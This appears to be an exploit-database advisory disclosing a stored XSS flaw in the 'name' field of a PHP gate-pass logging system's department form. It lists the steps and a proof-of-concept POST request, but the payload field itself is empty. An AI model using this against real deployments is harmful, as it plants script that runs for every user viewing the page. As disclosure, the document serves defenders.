# Exploit Title: Employee and Visitor Gate Pass Logging System 1.0 - 'name' Stored Cross-Site Scripting (XSS) # Date: 10.11.2021 # Exploit Author: İlhami Selamet # Vendor Homepage: https://www.sourcecodester.com/php/15026/employee-and-visitor-gate-pass-logging-system-php-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=15026&title=Employee+and+Visitor+Gate+Pass+Logging+System+in+PHP+with+Source+Code # Version: v1.0 # Tested on: Kali Linux + XAMPP v8.0.12 Employee and Visitor Gate Pass Logging System PHP 1.0 suffers from a Cross Site Scripting (XSS) vulnerability. Step 1 - Login with admin account & navigate to 'Department List' tab. - http://localhost/employee_gatepass/admin/?page=maintenance/department Step 1 - Click on the 'Create New' button for adding a new department. Step 2 - Fill out all required fields to create a new department. Input a payload in the department 'name' field - Step 3 - Save the department. The stored XSS triggers for all users that navigate to the 'Department List' page. PoC POST /employee_gatepass/classes/Master.php?f=save_department HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------407760789114464123714007564888 Content-Length: 555 Origin: http://localhost Connection: close Referer: http://localhost/employee_gatepass/admin/?page=maintenance/department Cookie: PHPSESSID=8d0l6t3pq47irgnbipjjesrv54 -----------------------------407760789114464123714007564888 Content-Disposition: form-data; name="id" -----------------------------407760789114464123714007564888 Content-Disposition: form-data; name="name" -----------------------------407760789114464123714007564888 Content-Disposition: form-data; name="description" desc -----------------------------407760789114464123714007564888 Content-Disposition: form-data; name="status" 1 -----------------------------407760789114464123714007564888--